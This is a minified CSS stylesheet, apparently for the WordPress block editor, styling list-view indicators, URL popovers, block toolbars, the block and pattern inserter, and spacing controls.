.block-editor-list-view-drop-indicator__line{ background:var(--wp-admin-theme-color); border-radius:4px; height:4px; } .block-editor-list-view-drop-indicator--preview{ pointer-events:none; } .block-editor-list-view-drop-indicator--preview .components-popover__content{ overflow:hidden !important; } .block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line{ background:rgba(var(--wp-admin-theme-color--rgb), .04); border-radius:4px; height:32px; overflow:hidden; } .block-editor-list-view-drop-indicator--preview .block-editor-list-view-drop-indicator__line--darker{ background:rgba(var(--wp-admin-theme-color--rgb), .09); } .block-editor-list-view-placeholder{ height:32px; margin:0; padding:0; } .list-view-appender .block-editor-inserter__toggle{ background-color:#1e1e1e; color:#fff; height:24px; margin:8px 0 0 24px; padding:0; } .list-view-appender .block-editor-inserter__toggle.has-icon.is-next-40px-default-size{ min-width:24px; } .list-view-appender .block-editor-inserter__toggle:focus,.list-view-appender .block-editor-inserter__toggle:hover{ background:var(--wp-admin-theme-color); color:#fff; } .list-view-appender__description{ display:none; } .block-editor-media-placeholder__url-input-form{ min-width:260px; } @media (min-width:600px){ .block-editor-media-placeholder__url-input-form{ width:300px; } } .block-editor-media-placeholder__url-input-form input{ direction:ltr; } .modal-open .block-editor-media-replace-flow__options{ display:none; } .block-editor-media-replace-flow__indicator{ margin-left:4px; } .block-editor-media-replace-flow__media-upload-menu:not(:empty)+.block-editor-media-flow__url-input{ border-top:1px solid #1e1e1e; margin-top:8px; padding-bottom:8px; } .block-editor-media-flow__url-input{ margin-left:-8px; margin-right:-8px; padding:16px; } .block-editor-media-flow__url-input .block-editor-media-replace-flow__image-url-label{ display:block; margin-bottom:8px; top:16px; } .block-editor-media-flow__url-input .block-editor-link-control{ width:300px; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-url-input{ margin:0; padding:0; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__tools{ justify-content:flex-end; padding:16px var(--wp-admin-border-width-focus) var(--wp-admin-border-width-focus); } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-item.is-current{ padding:0; width:auto; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-input.block-editor-link-control__search-input input[type=text]{ margin:0; width:100%; } .block-editor-media-flow__url-input .block-editor-link-control .block-editor-link-control__search-actions{ padding:8px 0 0; } .block-editor-media-flow__error{ max-width:255px; padding:0 20px 20px; } .block-editor-media-flow__error .components-with-notices-ui{ max-width:255px; } .block-editor-media-flow__error .components-with-notices-ui .components-notice__content{ overflow:hidden; word-wrap:break-word; } .block-editor-media-flow__error .components-with-notices-ui .components-notice__dismiss{ position:absolute; right:10px; } .block-editor-multi-selection-inspector__card{ padding:16px; } .block-editor-multi-selection-inspector__card-title{ font-weight:500; } .block-editor-multi-selection-inspector__card .block-editor-block-icon{ height:24px; margin-left:-2px; padding:0 3px; width:36px; } .block-editor-responsive-block-control{ border-bottom:1px solid #ccc; margin-bottom:28px; padding-bottom:14px; } .block-editor-responsive-block-control:last-child{ border-bottom:0; padding-bottom:0; } .block-editor-responsive-block-control__title{ margin:0 0 .6em -3px; } .block-editor-responsive-block-control__label{ font-weight:600; margin-bottom:.6em; margin-left:-3px; } .block-editor-responsive-block-control__inner{ margin-left:-1px; } .block-editor-responsive-block-control__toggle{ margin-left:1px; } .block-editor-responsive-block-control .components-base-control__help{ border:0; clip-path:inset(50%); height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; word-wrap:normal !important; } .components-popover.block-editor-rich-text__inline-format-toolbar{ z-index:99998; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-popover__content{ border-radius:2px; box-shadow:none; margin-bottom:8px; min-width:auto; outline:none; width:auto; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar{ border-radius:2px; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar-group{ background:none; } .components-popover.block-editor-rich-text__inline-format-toolbar .components-dropdown-menu__toggle,.components-popover.block-editor-rich-text__inline-format-toolbar .components-toolbar__control{ min-height:48px; min-width:48px; padding-left:12px; padding-right:12px; } .block-editor-rich-text__inline-format-toolbar-group .components-dropdown-menu__toggle{ justify-content:center; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon{ width:auto; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon svg{ display:none; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button.has-icon:after{ content:attr(aria-label); } .block-editor-skip-to-selected-block{ position:absolute; top:-9999em; } .block-editor-skip-to-selected-block:focus{ background:#f1f1f1; font-size:14px; font-weight:600; z-index:100000; } .block-editor-tabbed-sidebar{ background-color:#fff; display:flex; flex-direction:column; flex-grow:1; height:100%; overflow:hidden; } .block-editor-tabbed-sidebar__tablist-and-close-button{ border-bottom:1px solid #ddd; display:flex; justify-content:space-between; padding-right:8px; } .block-editor-tabbed-sidebar__close-button{ align-self:center; background:#fff; order:1; } .block-editor-tabbed-sidebar__tablist{ margin-bottom:-1px; } .block-editor-tabbed-sidebar__tabpanel{ display:flex; flex-direction:column; flex-grow:1; overflow-y:auto; scrollbar-gutter:auto; } .block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{ flex-grow:1; padding:1px; position:relative; } @media (min-width:600px){ .block-editor-block-list__block .block-editor-url-input,.block-editor-url-input,.components-popover .block-editor-url-input{ min-width:300px; width:auto; } } .block-editor-block-list__block .block-editor-url-input.is-full-width,.block-editor-block-list__block .block-editor-url-input.is-full-width__suggestions,.block-editor-url-input.is-full-width,.block-editor-url-input.is-full-width__suggestions,.components-popover .block-editor-url-input.is-full-width,.components-popover .block-editor-url-input.is-full-width__suggestions{ width:100%; } .block-editor-block-list__block .block-editor-url-input .components-spinner,.block-editor-url-input .components-spinner,.components-popover .block-editor-url-input .components-spinner{ margin:0; position:absolute; right:8px; top:calc(50% - 8px); } .block-editor-url-input__suggestions{ max-height:200px; } @media not (prefers-reduced-motion){ .block-editor-url-input__suggestions{ transition:all .15s ease-in-out; } } .block-editor-url-input__suggestions{ overflow-y:auto; padding:4px 0; width:302px; } .block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{ display:none; } @media (min-width:600px){ .block-editor-url-input .components-spinner,.block-editor-url-input__suggestions{ display:grid; } } .block-editor-url-input__suggestion{ background:#fff; border:none; box-shadow:none; color:#757575; cursor:pointer; display:block; font-size:13px; height:auto; min-height:36px; text-align:left; width:100%; } .block-editor-url-input__suggestion:hover{ background:#ddd; } .block-editor-url-input__suggestion.is-selected,.block-editor-url-input__suggestion:focus{ background:var(--wp-admin-theme-color-darker-20); color:#fff; outline:none; } .components-toolbar-group>.block-editor-url-input__button,.components-toolbar>.block-editor-url-input__button{ position:inherit; } .block-editor-url-input__button .block-editor-url-input__back{ margin-right:4px; overflow:visible; } .block-editor-url-input__button .block-editor-url-input__back:after{ background:#ddd; content:""; display:block; height:24px; position:absolute; right:-1px; width:1px; } .block-editor-url-input__button-modal{ background:#fff; border:1px solid #ddd; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; } .block-editor-url-input__button-modal-line{ align-items:flex-start; display:flex; flex-direction:row; flex-grow:1; flex-shrink:1; min-width:0; } .block-editor-url-popover__additional-controls{ border-top:1px solid #1e1e1e; padding:8px; } .block-editor-url-popover__input-container{ padding:8px; } .block-editor-url-popover__row{ align-items:center; display:flex; gap:4px; } .block-editor-url-popover__row>:not(.block-editor-url-popover__settings-toggle){ flex-grow:1; gap:8px; } .block-editor-url-popover__additional-controls .components-button.has-icon{ height:auto; padding-left:8px; padding-right:8px; text-align:left; } .block-editor-url-popover__additional-controls .components-button.has-icon>svg{ margin-right:8px; } .block-editor-url-popover__settings-toggle{ flex-shrink:0; } .block-editor-url-popover__settings-toggle[aria-expanded=true] .dashicon{ transform:rotate(180deg); } .block-editor-url-popover__settings{ border-top:1px solid #1e1e1e; display:block; padding:16px; } .block-editor-url-popover__link-editor,.block-editor-url-popover__link-viewer{ display:flex; } .block-editor-url-popover__link-viewer-url{ align-items:center; display:flex; flex-grow:1; flex-shrink:1; margin-right:8px; max-width:350px; min-width:150px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-url-popover__link-viewer-url.has-invalid-link{ color:#cc1818; } .block-editor-url-popover__expand-on-click{ align-items:center; display:flex; min-width:350px; white-space:nowrap; } .block-editor-url-popover__expand-on-click .text{ flex-grow:1; } .block-editor-url-popover__expand-on-click .text p{ line-height:16px; margin:0; } .block-editor-url-popover__expand-on-click .text p.description{ color:#757575; font-size:12px; } .block-editor-hooks__block-hooks .components-toggle-control .components-h-stack .components-h-stack{ flex-direction:row; } .block-editor-hooks__block-hooks .block-editor-hooks__block-hooks-helptext{ color:#757575; font-size:12px; margin-bottom:16px; } div.block-editor-bindings__panel{ grid-template-columns:repeat(auto-fit, minmax(100%, 1fr)); } div.block-editor-bindings__panel button:hover .block-editor-bindings__item span{ color:inherit; } .border-block-support-panel .single-column{ grid-column:span 1; } .color-block-support-panel .block-editor-contrast-checker{ grid-column:span 2; margin-top:16px; } .color-block-support-panel .block-editor-contrast-checker .components-notice__content{ margin-right:0; } .color-block-support-panel.color-block-support-panel .color-block-support-panel__inner-wrapper{ row-gap:0; } .color-block-support-panel .block-editor-tools-panel-color-gradient-settings__item.first{ margin-top:0; } .dimensions-block-support-panel .single-column{ grid-column:span 1; } .block-editor-hooks__layout-constrained .components-base-control{ margin-bottom:0; } .block-editor-hooks__layout-constrained-helptext{ color:#757575; font-size:12px; margin-bottom:0; } .block-editor-hooks__flex-layout-justification-controls,.block-editor-hooks__flex-layout-orientation-controls{ margin-bottom:12px; } .block-editor-hooks__flex-layout-justification-controls legend,.block-editor-hooks__flex-layout-orientation-controls legend{ margin-bottom:8px; } .block-editor-hooks__grid-layout-columns-and-rows-controls,.block-editor-hooks__grid-layout-minimum-width-control{ border:0; margin:0; padding:0; } .block-editor__spacing-visualizer{ border-color:var(--wp-admin-theme-color); border-style:solid; bottom:0; box-sizing:border-box; left:0; opacity:.5; pointer-events:none; position:absolute; right:0; top:0; } .typography-block-support-panel .single-column{ grid-column:span 1; } .block-editor-block-toolbar{ display:flex; flex-grow:1; overflow-x:auto; overflow-y:hidden; position:relative; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-toolbar{ transition:border-color .1s linear,box-shadow .1s linear; } } @media (min-width:600px){ .block-editor-block-toolbar{ overflow:inherit; } } .block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group{ background:none; border:0; border-right:1px solid #ddd; margin-bottom:-1px; margin-top:-1px; } .block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button:before{ background:color-mix(in srgb, var(--wp-block-synced-color) 10%, #0000); border-radius:2px; } .block-editor-block-toolbar.is-connected .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-connected .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher .components-button .block-editor-block-icon,.block-editor-block-toolbar.is-synced .block-editor-block-switcher__no-switcher-icon[aria-disabled=true] .block-editor-block-icon{ color:var(--wp-block-synced-color); } .block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2),.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar,.block-editor-block-toolbar:has(>:last-child:empty)>:nth-last-child(2) .components-toolbar-group,.block-editor-block-toolbar>:last-child,.block-editor-block-toolbar>:last-child .components-toolbar,.block-editor-block-toolbar>:last-child .components-toolbar-group{ border-right:none; } .block-editor-block-toolbar .components-toolbar-group:empty{ display:none; } .block-editor-block-contextual-toolbar{ background-color:#fff; display:block; flex-shrink:3; position:sticky; top:0; width:100%; z-index:31; } .block-editor-block-contextual-toolbar.components-accessible-toolbar{ border:none; border-radius:0; } .block-editor-block-contextual-toolbar.is-unstyled{ box-shadow:0 1px 0 0 rgba(0,0,0,.133); } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ overflow:auto; overflow-y:hidden; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar{ height:12px; width:12px; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-track{ background-color:initial; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar::-webkit-scrollbar-thumb{ background-clip:padding-box; background-color:#e0e0e0; border:3px solid #0000; border-radius:8px; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus::-webkit-scrollbar-thumb,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover::-webkit-scrollbar-thumb{ background-color:#949494; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-color:#e0e0e0 #0000; scrollbar-gutter:stable both-edges; scrollbar-width:thin; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:focus-within,.block-editor-block-contextual-toolbar .block-editor-block-toolbar:hover{ scrollbar-color:#949494 #0000; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ will-change:transform; } @media (hover:none){ .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-color:#949494 #0000; } } .block-editor-block-contextual-toolbar .block-editor-block-toolbar{ scrollbar-gutter:auto; } .block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar-group:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child .components-toolbar:after,.block-editor-block-contextual-toolbar .block-editor-block-toolbar>:last-child:after{ display:none; } .block-editor-block-contextual-toolbar>.block-editor-block-toolbar{ flex-grow:0; width:auto; } .block-editor-block-contextual-toolbar .block-editor-block-parent-selector{ margin-bottom:-1px; margin-top:-1px; position:relative; } .block-editor-block-contextual-toolbar .block-editor-block-parent-selector:after{ align-items:center; background-color:#1e1e1e; border-radius:100%; content:""; display:inline-flex; height:2px; position:absolute; right:0; top:15px; width:2px; } .block-editor-block-toolbar__block-controls .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.block-editor-block-toolbar__block-controls .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ margin:0 !important; width:24px !important; } .block-editor-block-toolbar__block-controls .components-toolbar-group{ padding:0; } .block-editor-block-toolbar .components-toolbar,.block-editor-block-toolbar .components-toolbar-group,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar,.block-editor-rich-text__inline-format-toolbar-group .components-toolbar-group{ display:flex; flex-wrap:nowrap; } .block-editor-block-toolbar__slot{ display:inline-flex; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)){ width:auto; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)) svg{ display:none; } .show-icon-labels .block-editor-block-toolbar .components-button.has-icon:where(:not(.has-text)):after{ content:attr(aria-label); font-size:12px; } .show-icon-labels .components-accessible-toolbar .components-toolbar-group>div:first-child:last-child>.components-button.has-icon{ padding-left:6px; padding-right:6px; } .show-icon-labels .block-editor-block-switcher .components-dropdown-menu__toggle .block-editor-block-icon,.show-icon-labels .block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ height:0 !important; min-width:0 !important; width:0 !important; } .show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ border-bottom-right-radius:0; border-top-right-radius:0; padding-left:12px; padding-right:12px; text-wrap:nowrap; } .show-icon-labels .block-editor-block-parent-selector .block-editor-block-parent-selector__button .block-editor-block-icon{ width:0; } .show-icon-labels .block-editor-block-mover .block-editor-block-mover__move-button-container{ position:relative; width:auto; } @media (min-width:600px){ .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{ background:#e0e0e0; content:""; height:1px; left:50%; margin-top:-.5px; position:absolute; top:50%; transform:translate(-50%); width:100%; } } @media (min-width:782px){ .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover-button,.show-icon-labels .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{ padding-left:6px; padding-right:6px; } .show-icon-labels .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover-button{ padding-left:8px; padding-right:8px; } .show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-mover{ border-left:1px solid #ddd; margin-left:6px; margin-right:-6px; white-space:nowrap; } .show-icon-labels .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon{ padding-left:12px; padding-right:12px; } .show-icon-labels .block-editor-block-contextual-toolbar .block-editor-block-mover.is-horizontal .block-editor-block-mover-button.block-editor-block-mover-button{ width:auto; } .show-icon-labels .components-toolbar,.show-icon-labels .components-toolbar-group{ flex-shrink:1; } .show-icon-labels .block-editor-rich-text__inline-format-toolbar-group .components-button+.components-button{ margin-left:6px; } .block-editor-block-toolbar-change-design-content-wrapper{ padding:12px; width:320px; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr 1fr; grid-gap:12px; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .block-editor-block-toolbar-change-design-content-wrapper .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ min-height:100px; } .block-editor-inserter{ background:none; border:none; display:inline-block; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:0; padding:0; } @media (min-width:782px){ .block-editor-inserter{ position:relative; } } .block-editor-inserter__main-area{ gap:16px; height:100%; position:relative; } .block-editor-inserter__main-area.show-as-tabs{ gap:0; } @media (min-width:782px){ .block-editor-inserter__main-area .block-editor-tabbed-sidebar{ width:350px; } } .block-editor-inserter__popover.is-quick .components-popover__content{ border:none; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; outline:none; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>*{ border-left:1px solid #ccc; border-right:1px solid #ccc; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:first-child{ border-radius:4px 4px 0 0; border-top:1px solid #ccc; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>:last-child{ border-bottom:1px solid #ccc; border-radius:0 0 4px 4px; } .block-editor-inserter__popover.is-quick .components-popover__content .block-editor-inserter__quick-inserter>.components-button{ border:1px solid #1e1e1e; } .block-editor-inserter__popover .block-editor-inserter__menu{ margin:-12px; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__tablist{ top:60px; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__main-area{ height:auto; overflow:visible; } .block-editor-inserter__popover .block-editor-inserter__menu .block-editor-inserter__preview-container{ display:none; } .block-editor-inserter__toggle.components-button{ align-items:center; border:none; cursor:pointer; display:inline-flex; outline:none; padding:0; } @media not (prefers-reduced-motion){ .block-editor-inserter__toggle.components-button{ transition:color .2s ease; } } .block-editor-inserter__menu{ height:100%; overflow:visible; position:relative; } @media (min-width:782px){ .block-editor-inserter__menu.show-panel{ width:630px; } } .block-editor-inserter__inline-elements{ margin-top:-1px; } .block-editor-inserter__menu.is-bottom:after{ border-bottom-color:#fff; } .components-popover.block-editor-inserter__popover{ z-index:99999; } .block-editor-inserter__search{ padding:16px 16px 0; } .block-editor-inserter__no-tab-container{ flex-grow:1; overflow-y:auto; position:relative; } .block-editor-inserter__panel-header{ align-items:center; display:inline-flex; padding:16px 16px 0; position:relative; } .block-editor-inserter__panel-content{ padding:16px; } .block-editor-inserter__panel-title,.block-editor-inserter__panel-title button{ color:#757575; font-size:11px; font-weight:500; margin:0 12px 0 0; text-transform:uppercase; } .block-editor-inserter__panel-dropdown select.components-select-control__input.components-select-control__input.components-select-control__input{ height:36px; line-height:36px; } .block-editor-inserter__panel-dropdown select{ border:none; } .block-editor-inserter__reusable-blocks-panel{ position:relative; text-align:right; } .block-editor-inserter__no-results,.block-editor-inserter__patterns-loading{ padding:32px; text-align:center; } .block-editor-inserter__child-blocks{ padding:0 16px; } .block-editor-inserter__parent-block-header{ align-items:center; display:flex; } .block-editor-inserter__parent-block-header h2{ font-size:13px; } .block-editor-inserter__parent-block-header .block-editor-block-icon{ margin-right:8px; } .block-editor-inserter__preview-container__popover{ top:16px !important; } .block-editor-inserter__preview-container{ display:none; max-height:calc(100% - 32px); overflow-y:hidden; padding:16px; width:280px; } @media (min-width:782px){ .block-editor-inserter__preview-container{ display:block; } } .block-editor-inserter__preview-container .block-editor-inserter__media-list__list-item{ height:100%; } .block-editor-inserter__preview-container .block-editor-block-card{ padding-bottom:4px; padding-left:0; padding-right:0; } .block-editor-inserter__insertable-blocks-at-selection{ border-bottom:1px solid #e0e0e0; } .block-editor-inserter__block-patterns-tabs-container,.block-editor-inserter__media-tabs-container{ display:flex; flex-direction:column; flex-grow:1; justify-content:space-between; padding:16px; } .block-editor-inserter__category-tablist{ margin-bottom:8px; } .block-editor-inserter__category-panel{ display:flex; flex-direction:column; outline:1px solid #0000; padding:0 16px; } @media (min-width:782px){ .block-editor-inserter__category-panel{ background:#f0f0f0; border-left:1px solid #e0e0e0; border-top:1px solid #e0e0e0; height:calc(100% + 1px); left:350px; padding:0; position:absolute; top:-1px; width:280px; } .block-editor-inserter__category-panel .block-editor-block-patterns-list,.block-editor-inserter__category-panel .block-editor-inserter__media-list{ padding:0 24px 16px; } } .block-editor-inserter__patterns-category-panel-header{ padding:8px 0; } @media (min-width:782px){ .block-editor-inserter__patterns-category-panel-header{ padding:8px 24px; } } .block-editor-inserter__patterns-category-no-results{ margin-top:24px; } .block-editor-inserter__patterns-filter-help{ border-top:1px solid #ddd; color:#757575; min-width:280px; padding:16px; } .block-editor-block-patterns-list,.block-editor-inserter__media-list{ flex-grow:1; height:100%; overflow-y:auto; } .block-editor-inserter__preview-content{ align-items:center; background:#f0f0f0; display:grid; flex-grow:1; } .block-editor-inserter__preview-content-missing{ align-items:center; background:#f0f0f0; border-radius:2px; color:#757575; display:flex; flex:1; justify-content:center; min-height:144px; } .block-editor-inserter__tips{ border-top:1px solid #ddd; flex-shrink:0; padding:16px; position:relative; } .block-editor-inserter__quick-inserter{ max-width:100%; width:100%; } @media (min-width:782px){ .block-editor-inserter__quick-inserter{ width:350px; } } .block-editor-inserter__quick-inserter-results .block-editor-inserter__panel-header{ float:left; height:0; padding:0; } .block-editor-inserter__quick-inserter.has-expand .block-editor-inserter__panel-content,.block-editor-inserter__quick-inserter.has-search .block-editor-inserter__panel-content{ padding:16px; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list{ display:grid; grid-template-columns:1fr 1fr; grid-gap:8px; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ margin-bottom:0; } .block-editor-inserter__quick-inserter-patterns .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ min-height:100px; } .block-editor-inserter__quick-inserter-separator{ border-top:1px solid #ddd; } .block-editor-inserter__popover.is-quick>.components-popover__content{ padding:0; } .block-editor-inserter__quick-inserter-expand.components-button{ background:#1e1e1e; border-radius:0; color:#fff; display:block; width:100%; } .block-editor-inserter__quick-inserter-expand.components-button:hover{ color:#fff; } .block-editor-inserter__quick-inserter-expand.components-button:active{ color:#ccc; } .block-editor-inserter__quick-inserter-expand.components-button.components-button:focus:not(:disabled){ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); box-shadow:none; } .block-editor-block-patterns-explorer__sidebar{ bottom:0; left:0; overflow-x:visible; overflow-y:auto; padding:24px 32px 32px; position:absolute; top:72px; width:280px; } .block-editor-block-patterns-explorer__sidebar__categories-list__item{ display:block; height:48px; text-align:left; width:100%; } .block-editor-block-patterns-explorer__search{ margin-bottom:32px; } .block-editor-block-patterns-explorer__search-results-count{ padding-bottom:32px; } .block-editor-block-patterns-explorer__list{ margin-left:280px; padding:24px 0 32px; } .block-editor-block-patterns-explorer__list .block-editor-patterns__sync-status-filter .components-input-control__container{ width:380px; } .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ display:grid; grid-gap:32px; grid-template-columns:repeat(1, 1fr); margin-bottom:16px; } @media (min-width:1080px){ .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ grid-template-columns:repeat(2, 1fr); } } @media (min-width:1440px){ .block-editor-block-patterns-explorer .block-editor-block-patterns-list{ grid-template-columns:repeat(3, 1fr); } } .block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-block-patterns-list__list-item{ min-height:240px; } .block-editor-block-patterns-explorer .block-editor-block-patterns-list .block-editor-inserter__media-list__list-item{ height:inherit; max-height:800px; min-height:100px; } .components-heading.block-editor-inserter__patterns-category-panel-title{ font-weight:500; } .block-editor-inserter__media-library-button.components-button,.block-editor-inserter__patterns-explore-button.components-button{ justify-content:center; margin-top:16px; padding:16px; width:100%; } .block-editor-inserter__media-panel{ display:flex; flex-direction:column; min-height:100%; padding:0 16px; } @media (min-width:782px){ .block-editor-inserter__media-panel{ padding:0; } } .block-editor-inserter__media-panel .block-editor-inserter__media-panel-spinner{ align-items:center; display:flex; flex:1; height:100%; justify-content:center; } .block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{ margin-bottom:24px; } @media (min-width:782px){ .block-editor-inserter__media-panel .block-editor-inserter__media-panel-search{ margin-bottom:0; padding:16px 24px; } } .block-editor-inserter__media-list__list-item{ cursor:pointer; margin-bottom:24px; position:relative; } .block-editor-inserter__media-list__list-item.is-placeholder{ min-height:100px; } .block-editor-inserter__media-list__list-item[draggable=true] .block-editor-inserter__media-list__list-item{ cursor:grab; } .block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview>*{ outline-color:#0000004d; } .block-editor-inserter__media-list__list-item.is-hovered .block-editor-inserter__media-list__item-preview-options>button{ display:block; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options{ position:absolute; right:8px; top:8px; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button{ background:#fff; display:none; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button.is-opened,.block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:focus{ display:block; } .block-editor-inserter__media-list__list-item .block-editor-inserter__media-list__item-preview-options>button:hover{ box-shadow:inset 0 0 0 2px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-inserter__media-list__item{ height:100%; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview{ align-items:center; border-radius:2px; display:flex; overflow:hidden; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview>*{ margin:0 auto; max-width:100%; outline:1px solid #0000001a; outline-offset:-1px; } .block-editor-inserter__media-list__item .block-editor-inserter__media-list__item-preview .block-editor-inserter__media-list__item-preview-spinner{ align-items:center; background:#ffffffb3; display:flex; height:100%; justify-content:center; pointer-events:none; position:absolute; width:100%; } .block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } @media not (prefers-reduced-motion){ .block-editor-inserter__media-list__item:focus .block-editor-inserter__media-list__item-preview>*{ transition:outline .1s linear; } } .block-editor-inserter__media-list__item-preview-options__popover .components-menu-item__button .components-menu-item__item{ min-width:auto; } .block-editor-inserter__mobile-tab-navigation{ height:100%; padding:16px; } .block-editor-inserter__mobile-tab-navigation>*{ height:100%; } @media (min-width:600px){ .block-editor-inserter-media-tab-media-preview-inserter-external-image-modal{ max-width:480px; } } .block-editor-inserter-media-tab-media-preview-inserter-external-image-modal p{ margin:0; } .block-editor-inserter__hint{ margin:16px 16px 0; } .block-editor-patterns__sync-status-filter .components-input-control__container select.components-select-control__input{ height:40px; } .block-editor-inserter__pattern-panel-placeholder{ display:none; } .block-editor-inserter__menu.is-zoom-out{ display:flex; } @media (min-width:782px){ .block-editor-inserter__menu.is-zoom-out.show-panel:after{ content:""; display:block; height:100%; width:300px; } } @media (max-width:959px){ .show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-block-patterns-explorer .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{ flex-direction:column; } } .show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-next,.show-icon-labels .block-editor-inserter__category-panel .block-editor-patterns__grid-pagination .block-editor-patterns__grid-pagination-previous{ flex-direction:column; } .block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{ display:none; padding:0 24px 16px; } @media (min-width:480px){ .block-editor-tabbed-sidebar__tabpanel .block-editor-inserter__help-text{ display:block; } } .spacing-sizes-control{ border:0; margin:0; padding:0; } .spacing-sizes-control .spacing-sizes-control__custom-value-input,.spacing-sizes-control .spacing-sizes-control__label{ margin-bottom:0; } .spacing-sizes-control .spacing-sizes-control__custom-value-range,.spacing-sizes-control .spacing-sizes-control__range-control{ flex:1; margin-bottom:0; } .spacing-sizes-control__header{ height:16px; margin-bottom:12px; } 